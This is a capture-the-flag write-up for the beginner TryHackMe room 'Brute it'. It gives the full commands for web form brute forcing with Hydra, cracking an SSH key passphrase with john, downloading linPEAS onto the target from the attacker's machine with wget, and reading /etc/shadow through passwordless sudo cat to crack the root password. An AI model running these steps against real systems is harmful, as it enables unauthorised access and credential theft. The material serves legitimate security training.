[CTF] Tryhackme : Brute it

01 : Introduction

Welcome in this writeup focused on CTF ‘Brute it’ published by ReddyyZ on platform Tryhackme.

As mentioned in room’s introduction, this CTF designed for beginners will cover the following fields : Brute Force, Hash cracking and privilege escalation. Let’s start with enumeration and scan of the machine.

02 : Enumeration

As usual we start with a scan of the machine with nmap and the following command :

nmap -sC -sV <MACHINE-IP>

scan with nmap

As results, we have 2 open ports, ssh on port 22 and a website for port 80. If we go on the website we just have the default page for apache server :

index page of the website

I tried to look for something in source code but nothing relevant there. Now, we can enumerate the website with tool gobuster. First, we’ll try to find some interesting folders or files on this web server, by using this command :

gobuster dir -u http://<MACHINE-IP> -w /usr/share/dirbuster/directory-list-2.3-medium.txt

After few seconds we have a result :

enumeration with gobuster command

And we have a form, requiring a username and a password :

form page

If we look closely in source code, there is something interesting…

Page’s code source

Now that we have a username, we need a way to find the password. As room’s title suggests, we can use brute force to find it. Let’s use the useful tool called Hydra to find this password. But before we need to understand how form works : where form is submitted, the error message used to inform user that credentials are wrong and parameters send within the form.

I send admin as username and admin as password and we can see that message is “Username or password invalid” . We also have that form is send with a post request to the adress /admin/ with the following parameters : user and pass. We have gathred required information for Hydra. Now, we can launch the command :

hydra -l admin -P rockyou.txt <IP Machine> http-post-form “/admin/:user=^USER^&pass=^PASS^:F=invalid”

Wordlist used is called rockyou, a famous one that you can find easily on github for example.

Brute force POST form with hydra

And we have a result ! Now we can enter login and password to access to this part of the website.

Page after successful login

We got the web flag. On the machine, one of the users is probably called jack. The page also contains RSA key for this user. We can probably use it to connect to the machine by SSH. However, we need to find to the passphrase of this key, this is the aim for the next step.

03 : Foothold

For this step, we’ll use john. First, we save the key. Then, we can get hash of the key by using script ssh2john.py, like this :

ssh2john.py rsa > rsa.hash

get hash with john

Now we can use john and wordlist rockyou to get the pass :

john rsa.hash -wordlist=rockyou.txt

crack passphrase with john

We get a password ! Before using it, we need to modify the rights on the key :

chmod 400 rsa

Everything is ok now ! We can connect to the machine !

ssh -i rsa john@<IP Machine>

connection to machine with ssh

It works ! We can read user flag located in user folder :

Read user flag

04 : Privilege Escalation

We want now to get access to an account with more privileges, let’s say root. We need to find a way to get this access. If I use command id I see that my user, john, is in sudo group, I could just use sudo su command to become root. However, I do not have john’s password to do this action.

result of id command

If I look in /etc/crontab file, to see if there is a process I can manipulate to get access :

Read of crontab file

Nothing much interesting there too…

So, I’m gonna use linPEAS, a script used to enumerate a machine and find ways to get a privilege escalation. To import this script from my machine to the box machine, I create a web server from the folder where my script is on my machine with python like this:

sudo python3 -m http.server 80

creation of web server from my machine

Then we can get the file from box machine with wget :

wget http://<MY Machine IP>/linPEAS.sh

Recovery of linpeas file from distant machine

Now I just have to change script rights :

chmod +x linPEAS.sh

And … let’s execute the script !

./linPEAS.sh

Few moments later, I noticed something interesting :

Result of linPEAS

Why this thing is relevant ? If we can use cat as sudo without entering any password, then we can for example see /etc/shadow file, that contains users’s password and this is what we’ll do :

shadow content

We register root pass hash in a file on our computer, and then, like for RSA, we’ll use john to get a password.

sudo john rsa.hash

crack root pass with john

And that’s it ! Now I just have to enter su command with the password we just found and we’re root on this machine !

Get access to root

To finish the room, we recover root flag located in /root folder.

Find and read root flag.

Room is now over. Hope you enjoyed this room which is really perfect to discover brute force and tools like hydra or john.